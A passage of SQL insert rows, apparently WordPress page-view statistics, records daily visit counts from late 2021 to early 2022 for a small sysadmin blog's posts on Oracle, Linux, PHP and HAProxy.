(1784,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-09-19',1,97),
(1785,'/','home','2021-09-19',45,365),
(1786,'/about-me/','page','2021-09-19',2,51),
(1787,'/','home','2021-09-20',37,365),
(1788,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-09-20',1,150),
(1789,'/impdp-errors-ora-02374-ora-12899/','post','2021-09-20',1,56),
(1790,'/','home','2021-09-21',57,365),
(1791,'/','home','2021-09-22',38,365),
(1792,'/about-me/','page','2021-09-22',1,51),
(1793,'/impdp-errors-ora-02374-ora-12899/','post','2021-09-22',14,56),
(1794,'/','home','2021-09-23',32,365),
(1795,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-09-23',2,583),
(1796,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-09-23',1,104),
(1797,'/','home','2021-09-24',53,365),
(1798,'/about-me/','page','2021-09-24',3,51),
(1799,'/impdp-errors-ora-02374-ora-12899/','post','2021-09-24',1,56),
(1800,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-09-24',1,583),
(1801,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-09-24',1,104),
(1802,'/','home','2021-09-25',49,365),
(1803,'/','home','2021-09-26',46,365),
(1804,'/','home','2021-09-27',38,365),
(1805,'/impdp-errors-ora-02374-ora-12899/','post','2021-09-27',2,56),
(1806,'/','home','2021-09-28',58,365),
(1807,'/impdp-errors-ora-02374-ora-12899/','post','2021-09-28',24,56),
(1808,'/','home','2021-09-29',37,365),
(1809,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-09-29',1,104),
(1810,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-09-29',1,583),
(1811,'/','home','2021-09-30',37,365),
(1812,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-09-30',1,150),
(1813,'/about-me/','page','2021-09-30',1,51),
(1814,'/add-new-disk-to-redhat-based-linux-without-reboot','post','2021-09-30',2,97),
(1815,'/','home','2021-10-01',39,365),
(1816,'/impdp-errors-ora-02374-ora-12899/','post','2021-10-01',1,56),
(1817,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-10-01',1,312),
(1818,'/','home','2021-10-02',43,365),
(1819,'/','home','2021-10-03',27,365),
(1820,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-10-03',1,104),
(1821,'/about-me/','page','2021-10-03',6,51),
(1822,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-10-03',1,97),
(1823,'/','home','2021-10-04',34,365),
(1824,'/impdp-errors-ora-02374-ora-12899/','post','2021-10-04',3,56),
(1825,'/','home','2021-10-05',24,365),
(1826,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-10-05',1,97),
(1827,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-10-05',2,583),
(1828,'/','home','2021-10-06',66,365),
(1829,'/about-me/','page','2021-10-06',5,51),
(1830,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-10-06',2,583),
(1831,'/hosting-a-podcast/','post','2021-10-06',2,329),
(1832,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-10-06',2,312),
(1833,'/how-to-make-apache-web-server-more-secure/','post','2021-10-06',2,305),
(1834,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-10-06',2,66),
(1835,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-10-06',2,150),
(1836,'/change-the-character-set-collation-of-a-table/','post','2021-10-06',2,68),
(1837,'/connection-encryption-in-oracle-database/','post','2021-10-06',2,110),
(1838,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-10-06',2,97),
(1839,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-10-06',4,104),
(1840,'/','home','2021-10-07',38,365),
(1841,'/about-me/','page','2021-10-07',2,51),
(1842,'/connection-encryption-in-oracle-database/','post','2021-10-07',1,110),
(1843,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-10-07',2,97),
(1844,'/','home','2021-10-08',38,365),
(1845,'/about-me/','page','2021-10-08',2,51),
(1846,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-10-08',1,583),
(1847,'/hosting-a-podcast/','post','2021-10-08',1,329),
(1848,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-10-08',1,312),
(1849,'/how-to-make-apache-web-server-more-secure/','post','2021-10-08',1,305),
(1850,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-10-08',1,66),
(1851,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-10-08',1,150),
(1852,'/change-the-character-set-collation-of-a-table/','post','2021-10-08',1,68),
(1853,'/connection-encryption-in-oracle-database/','post','2021-10-08',1,110),
(1854,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-10-08',3,97),
(1855,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-10-08',1,104),
(1856,'/','home','2021-10-09',33,365),
(1857,'/about-me/','page','2021-10-09',1,51),
(1858,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-10-09',1,583),
(1859,'/hosting-a-podcast/','post','2021-10-09',1,329),
(1860,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-10-09',2,312),
(1861,'/how-to-make-apache-web-server-more-secure/','post','2021-10-09',1,305),
(1862,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-10-09',1,66),
(1863,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-10-09',1,150),
(1864,'/change-the-character-set-collation-of-a-table/','post','2021-10-09',1,68),
(1865,'/connection-encryption-in-oracle-database/','post','2021-10-09',1,110),
(1866,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-10-09',1,97),
(1867,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-10-09',1,104),
(1868,'/','home','2021-10-10',40,365),
(1869,'/impdp-errors-ora-02374-ora-12899/','post','2021-10-10',1,56),
(1870,'/','home','2021-10-11',36,365),
(1871,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-10-11',1,104),
(1872,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-10-11',1,583),
(1873,'/','home','2021-10-12',36,365),
(1874,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7','post','2021-10-12',2,104),
(1875,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-10-13',2,312),
(1876,'/','home','2021-10-13',52,365),
(1877,'/about-me/','page','2021-10-13',1,51),
(1878,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-10-13',1,583),
(1879,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7','post','2021-10-13',2,104),
(1880,'/','home','2021-10-14',69,365),
(1881,'/about-me/','page','2021-10-14',1,51),
(1882,'/','home','2021-10-15',34,365),
(1883,'/impdp-errors-ora-02374-ora-12899','post','2021-10-15',2,56),
(1884,'/add-new-disk-to-redhat-based-linux-without-reboot','post','2021-10-15',2,97),
(1885,'/','home','2021-10-16',31,365),
(1886,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-10-16',1,583),
(1887,'/impdp-errors-ora-02374-ora-12899','post','2021-10-16',2,56),
(1888,'/','home','2021-10-17',34,365),
(1889,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-10-17',3,104),
(1890,'/','home','2021-10-18',35,365),
(1891,'/about-me/','page','2021-10-18',7,51),
(1892,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-10-19',1,312),
(1893,'/','home','2021-10-19',28,365),
(1894,'/','home','2021-10-20',48,365),
(1895,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-10-20',1,583),
(1896,'/','home','2021-10-21',44,365),
(1897,'/about-me/','page','2021-10-21',2,51),
(1898,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-10-21',1,312),
(1899,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7','post','2021-10-21',2,104),
(1900,'/','home','2021-10-22',21,365),
(1901,'/','home','2021-10-23',35,365),
(1902,'/about-me/','page','2021-10-23',1,51),
(1903,'/','home','2021-10-24',34,365),
(1904,'/','home','2021-10-25',36,365),
(1905,'/','home','2021-10-26',39,365),
(1906,'/about-me/','page','2021-10-26',2,51),
(1907,'/backup-restore-progress/','post','2021-10-26',1,64),
(1908,'/','home','2021-10-27',57,365),
(1909,'/','home','2021-10-28',33,365),
(1910,'/impdp-errors-ora-02374-ora-12899','post','2021-10-28',3,56),
(1911,'/backup-restore-progress','post','2021-10-28',2,64),
(1912,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7','post','2021-10-28',2,104),
(1913,'/','home','2021-10-29',62,365),
(1914,'/about-me/','page','2021-10-29',1,51),
(1915,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-10-29',1,312),
(1916,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-10-29',1,97),
(1917,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-10-29',1,104),
(1918,'/how-to-make-apache-web-server-more-secure/','post','2021-10-29',1,305),
(1919,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-10-29',1,150),
(1920,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-10-29',1,583),
(1921,'/backup-restore-progress/','post','2021-10-29',1,64),
(1922,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-10-29',1,27),
(1923,'/connection-encryption-in-oracle-database/','post','2021-10-29',1,110),
(1924,'/database-startup-error-fatal-ni-connect-error-12547/','post','2021-10-29',1,60),
(1925,'/change-the-character-set-collation-of-a-table/','post','2021-10-29',1,68),
(1926,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-10-29',1,66),
(1927,'/impdp-errors-ora-02374-ora-12899/','post','2021-10-29',1,56),
(1928,'/','home','2021-10-30',36,365),
(1929,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7','post','2021-10-30',2,104),
(1930,'/impdp-errors-ora-02374-ora-12899','post','2021-10-30',2,56),
(1931,'/','home','2021-10-31',51,365),
(1932,'/about-me/','page','2021-10-31',1,51),
(1933,'/','home','2021-11-01',38,365),
(1934,'/','home','2021-11-02',30,365),
(1935,'/about-me/','page','2021-11-02',1,51),
(1936,'/','home','2021-11-03',37,365),
(1937,'/impdp-errors-ora-02374-ora-12899/','post','2021-11-03',1,56),
(1938,'/','home','2021-11-04',47,365),
(1939,'/','home','2021-11-05',55,365),
(1940,'/about-me/','page','2021-11-05',3,51),
(1941,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-05',4,583),
(1942,'/how-to-make-apache-web-server-more-secure/','post','2021-11-05',4,305),
(1943,'/connection-encryption-in-oracle-database/','post','2021-11-05',4,110),
(1944,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-11-05',4,97),
(1945,'/change-the-character-set-collation-of-a-table/','post','2021-11-05',4,68),
(1946,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-11-05',4,66),
(1947,'/backup-restore-progress/','post','2021-11-05',3,64),
(1948,'/database-startup-error-fatal-ni-connect-error-12547/','post','2021-11-05',3,60),
(1949,'/impdp-errors-ora-02374-ora-12899/','post','2021-11-05',1,56),
(1950,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-11-05',1,27),
(1951,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-11-05',2,312),
(1952,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-11-05',2,104),
(1953,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-11-05',2,150),
(1954,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2021-11-05',1,583),
(1955,'/hosting-a-podcast/','post','2021-11-05',2,329),
(1956,'/how-to-make-apache-web-server-more-secure/feed/','feed','2021-11-05',1,305),
(1957,'/connection-encryption-in-oracle-database/feed/','feed','2021-11-05',1,110),
(1958,'/add-new-disk-to-redhat-based-linux-without-reboot/feed/','feed','2021-11-05',1,97),
(1959,'/change-the-character-set-collation-of-a-table/feed/','feed','2021-11-05',1,68),
(1960,'/rebuild-and-reorganize-all-indexes-within-a-database/feed/','feed','2021-11-05',1,66),
(1961,'/backup-restore-progress/feed/','feed','2021-11-05',1,64),
(1962,'/database-startup-error-fatal-ni-connect-error-12547/feed/','feed','2021-11-05',1,60),
(1963,'/impdp-errors-ora-02374-ora-12899/feed/','feed','2021-11-05',1,56),
(1964,'/','home','2021-11-06',61,365),
(1965,'/about-me/','page','2021-11-06',3,51),
(1966,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-06',1,583),
(1967,'/hosting-a-podcast/','post','2021-11-06',1,329),
(1968,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-11-06',1,312),
(1969,'/how-to-make-apache-web-server-more-secure/','post','2021-11-06',1,305),
(1970,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-11-06',1,66),
(1971,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-11-06',1,150),
(1972,'/change-the-character-set-collation-of-a-table/','post','2021-11-06',1,68),
(1973,'/connection-encryption-in-oracle-database/','post','2021-11-06',1,110),
(1974,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-11-06',1,97),
(1975,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-11-06',1,104),
(1976,'/','home','2021-11-07',56,365),
(1977,'/about-me/','page','2021-11-07',6,51),
(1978,'/connection-encryption-in-oracle-database/','post','2021-11-07',1,110),
(1979,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-11-07',1,312),
(1980,'/change-the-character-set-collation-of-a-table/','post','2021-11-07',1,68),
(1981,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-07',1,583),
(1982,'/','home','2021-11-08',44,365),
(1983,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-11-08',1,104),
(1984,'/','home','2021-11-09',48,365),
(1985,'/change-the-character-set-collation-of-a-table/','post','2021-11-09',2,68),
(1986,'/about-me/','page','2021-11-09',4,51),
(1987,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-11-09',1,66),
(1988,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-11-09',1,97),
(1989,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-09',3,583),
(1990,'/hosting-a-podcast/','post','2021-11-09',2,329),
(1991,'/connection-encryption-in-oracle-database/','post','2021-11-09',2,110),
(1992,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-11-09',1,104),
(1993,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-11-09',1,150),
(1994,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-11-09',2,312),
(1995,'/how-to-make-apache-web-server-more-secure/','post','2021-11-09',1,305),
(1996,'/','home','2021-11-10',40,365),
(1997,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7','post','2021-11-10',2,104),
(1998,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-10',1,583),
(1999,'/','home','2021-11-11',38,365),
(2000,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-11',1,583),
(2001,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7','post','2021-11-11',2,104),
(2002,'/','home','2021-11-12',53,365),
(2003,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-11-12',2,104),
(2004,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-12',2,583),
(2005,'/','home','2021-11-13',37,365),
(2006,'/impdp-errors-ora-02374-ora-12899/','post','2021-11-13',1,56),
(2007,'/','home','2021-11-14',33,365),
(2008,'/about-me/','page','2021-11-14',2,51),
(2009,'/','home','2021-11-15',33,365),
(2010,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-15',1,583),
(2011,'/about-me/','page','2021-11-15',2,51),
(2012,'/','home','2021-11-16',38,365),
(2013,'/about-me/','page','2021-11-16',2,51),
(2014,'/','home','2021-11-17',47,365),
(2015,'/about-me/','page','2021-11-17',2,51),
(2016,'/database-startup-error-fatal-ni-connect-error-12547/','post','2021-11-17',1,60),
(2017,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-17',1,583),
(2018,'/connection-encryption-in-oracle-database/','post','2021-11-17',1,110),
(2019,'/','home','2021-11-18',39,365),
(2020,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-18',3,583),
(2021,'/','home','2021-11-19',44,365),
(2022,'/about-me/','page','2021-11-19',1,51),
(2023,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-19',1,583),
(2024,'/','home','2021-11-20',34,365),
(2025,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-11-20',1,312),
(2026,'/impdp-errors-ora-02374-ora-12899/','post','2021-11-20',1,56),
(2027,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-11-20',2,27),
(2028,'/about-me/','page','2021-11-20',1,51),
(2029,'/','home','2021-11-21',39,365),
(2030,'/about-me/','page','2021-11-21',3,51),
(2031,'/','home','2021-11-22',32,365),
(2032,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-11-22',1,27),
(2033,'/about-me/','page','2021-11-22',1,51),
(2034,'/','home','2021-11-23',32,365),
(2035,'/','home','2021-11-24',29,365),
(2036,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-24',2,583),
(2037,'/','home','2021-11-25',47,365),
(2038,'/','home','2021-11-26',27,365),
(2039,'/about-me/','page','2021-11-26',1,51),
(2040,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-26',1,583),
(2041,'/','home','2021-11-27',36,365),
(2042,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-27',1,583),
(2043,'/','home','2021-11-28',31,365),
(2044,'/about-me/','page','2021-11-28',2,51),
(2045,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-28',1,583),
(2046,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-11-28',1,27),
(2047,'/impdp-errors-ora-02374-ora-12899','post','2021-11-28',2,56),
(2048,'/impdp-errors-ora-02374-ora-12899/','post','2021-11-29',1,56),
(2049,'/','home','2021-11-29',19,365),
(2050,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-11-29',3,583),
(2051,'/','home','2021-11-30',49,365),
(2052,'/about-me/','page','2021-11-30',1,51),
(2053,'/','home','2021-12-01',41,365),
(2054,'/about-me/','page','2021-12-01',1,51),
(2055,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-01',1,583),
(2056,'/impdp-errors-ora-02374-ora-12899/','post','2021-12-01',1,56),
(2057,'/','home','2021-12-02',34,365),
(2058,'/about-me/','page','2021-12-02',1,51),
(2059,'/','home','2021-12-03',31,365),
(2060,'/about-me/','page','2021-12-03',7,51),
(2061,'/','home','2021-12-04',25,365),
(2062,'/about-me/','page','2021-12-04',1,51),
(2063,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks','post','2021-12-04',2,27),
(2064,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-12-05',1,97),
(2065,'/','home','2021-12-05',41,365),
(2066,'/about-me/','page','2021-12-05',1,51),
(2067,'/','home','2021-12-06',30,365),
(2068,'/','home','2021-12-07',39,365),
(2069,'/about-me/','page','2021-12-07',2,51),
(2070,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-07',1,583),
(2071,'/','home','2021-12-08',46,365),
(2072,'/about-me/','page','2021-12-08',4,51),
(2073,'/','home','2021-12-09',41,365),
(2074,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-12-09',1,312),
(2075,'/about-me/','page','2021-12-09',1,51),
(2076,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-09',2,583),
(2077,'/','home','2021-12-10',38,365),
(2078,'/about-me/','page','2021-12-10',1,51),
(2079,'/','home','2021-12-11',23,365),
(2080,'/about-me/','page','2021-12-11',4,51),
(2081,'/','home','2021-12-12',30,365),
(2082,'/about-me/','page','2021-12-12',10,51),
(2083,'/','home','2021-12-13',49,365),
(2084,'/about-me/','page','2021-12-13',4,51),
(2085,'/','home','2021-12-14',37,365),
(2086,'/impdp-errors-ora-02374-ora-12899/','post','2021-12-14',1,56),
(2087,'/about-me/','page','2021-12-14',4,51),
(2088,'/','home','2021-12-15',36,365),
(2089,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-15',1,583),
(2090,'/about-me/','page','2021-12-15',1,51),
(2091,'/','home','2021-12-16',39,365),
(2092,'/about-me/','page','2021-12-16',2,51),
(2093,'/','home','2021-12-17',31,365),
(2094,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-17',1,583),
(2095,'/','home','2021-12-18',47,365),
(2096,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-18',2,583),
(2097,'/about-me/','page','2021-12-18',1,51),
(2098,'/','home','2021-12-19',37,365),
(2099,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-19',2,583),
(2100,'/about-me/','page','2021-12-19',1,51),
(2101,'/','home','2021-12-20',29,365),
(2102,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-20',3,583),
(2103,'/','home','2021-12-21',39,365),
(2104,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-21',4,583),
(2105,'/','home','2021-12-22',42,365),
(2106,'/about-me/','page','2021-12-22',2,51),
(2107,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-12-22',2,312),
(2108,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-12-22',2,97),
(2109,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-12-22',2,104),
(2110,'/how-to-make-apache-web-server-more-secure/','post','2021-12-22',3,305),
(2111,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-12-22',2,150),
(2112,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-22',2,583),
(2113,'/backup-restore-progress/','post','2021-12-22',1,64),
(2114,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-12-22',1,27),
(2115,'/connection-encryption-in-oracle-database/','post','2021-12-22',2,110),
(2116,'/database-startup-error-fatal-ni-connect-error-12547/','post','2021-12-22',1,60),
(2117,'/change-the-character-set-collation-of-a-table/','post','2021-12-22',2,68),
(2118,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-12-22',2,66),
(2119,'/impdp-errors-ora-02374-ora-12899/','post','2021-12-22',1,56),
(2120,'/hosting-a-podcast/','post','2021-12-22',1,329),
(2121,'/','home','2021-12-23',56,365),
(2122,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-23',6,583),
(2123,'/about-me/','page','2021-12-23',1,51),
(2124,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-12-23',1,312),
(2125,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-12-23',1,97),
(2126,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-12-23',1,104),
(2127,'/how-to-make-apache-web-server-more-secure/','post','2021-12-23',1,305),
(2128,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-12-23',1,150),
(2129,'/backup-restore-progress/','post','2021-12-23',1,64),
(2130,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-12-23',1,27),
(2131,'/connection-encryption-in-oracle-database/','post','2021-12-23',1,110),
(2132,'/database-startup-error-fatal-ni-connect-error-12547/','post','2021-12-23',1,60),
(2133,'/change-the-character-set-collation-of-a-table/','post','2021-12-23',1,68),
(2134,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-12-23',1,66),
(2135,'/impdp-errors-ora-02374-ora-12899/','post','2021-12-23',1,56),
(2136,'/','home','2021-12-24',47,365),
(2137,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-24',3,583),
(2138,'/about-me/','page','2021-12-24',3,51),
(2139,'/','home','2021-12-25',52,365),
(2140,'/about-me/','page','2021-12-25',2,51),
(2141,'/','home','2021-12-26',31,365),
(2142,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-26',1,583),
(2143,'/','home','2021-12-27',36,365),
(2144,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-12-27',1,583),
(2145,'/','home','2021-12-28',22,365),
(2146,'/','home','2021-12-29',39,365),
(2147,'/','home','2021-12-30',43,365),
(2148,'/','home','2021-12-31',41,365),
(2149,'/','home','2022-01-01',38,365),
(2150,'/','home','2022-01-02',39,365),
(2151,'/how-to-make-apache-web-server-more-secure/','post','2022-01-02',1,305),
(2152,'/','home','2022-01-03',33,365),
(2153,'/how-to-make-apache-web-server-more-secure/','post','2022-01-03',1,305),
(2154,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2022-01-03',1,97),
(2155,'/','home','2022-01-04',24,365),
(2156,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-04',5,583),
(2157,'/','home','2022-01-05',25,365),
(2158,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-05',1,583),
(2159,'/','home','2022-01-06',27,365),
(2160,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-06',3,583),
(2161,'/rebuild-and-reorganize-all-indexes-within-a-database','post','2022-01-06',2,66),
(2162,'/about-me/','page','2022-01-06',1,51),
(2163,'/','home','2022-01-07',38,365),
(2164,'/about-me/','page','2022-01-07',1,51),
(2165,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-07',1,583),
(2166,'/','home','2022-01-08',26,365),
(2167,'/about-me/','page','2022-01-08',1,51),
(2168,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-08',1,583),
(2169,'/','home','2022-01-09',29,365),
(2170,'/ictbank.ir?magmadomain=ictbank.ir%7C','post','2022-01-09',2,76),
(2171,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2022-01-09',1,104),
(2172,'/','home','2022-01-10',28,365),
(2173,'/about-me/','page','2022-01-10',1,51),
(2174,'/','home','2022-01-11',21,365),
(2175,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-11',1,583),
(2176,'/','home','2022-01-12',33,365),
(2177,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-12',3,583),
(2178,'/','home','2022-01-13',28,365),
(2179,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-13',7,583),
(2180,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-14',4,583),
(2181,'/','home','2022-01-14',25,365),
(2182,'/','home','2022-01-15',26,365),
(2183,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-15',1,583),
(2184,'/','home','2022-01-16',27,365),
(2185,'/','home','2022-01-17',36,365),
(2186,'/about-me/','page','2022-01-17',1,51),
(2187,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-17',2,583),
(2188,'/','home','2022-01-18',20,365),
(2189,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-18',4,583),
(2190,'/','home','2022-01-19',30,365),
(2191,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-19',1,583),
(2192,'/','home','2022-01-20',26,365),
(2193,'/','home','2022-01-21',24,365),
(2194,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2022-01-21',1,583),
(2195,'/','home','2022-01-22',24,365),
